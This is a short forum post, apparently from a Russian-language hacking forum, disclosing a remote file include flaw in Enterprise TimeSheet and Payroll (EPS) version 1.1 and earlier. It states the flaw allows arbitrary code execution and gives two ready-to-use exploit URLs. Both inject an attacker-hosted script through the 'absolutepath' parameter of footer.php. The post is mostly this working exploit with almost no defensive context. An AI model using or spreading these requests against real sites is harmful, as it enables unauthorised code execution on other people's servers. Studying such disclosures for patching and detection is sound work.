• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability
Описание:
Позволяет выполнять произвольный код на удаленной машине с привилегиями nobody.
Пример/Эксплоит:
Код:
http://www.site.com/[EPS_path]/footer.php?absolutepath=[evil_scripts] 

http://www.site.com/[EPS_path]/admin/footer.php?absolutepath=[evil_scripts]
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх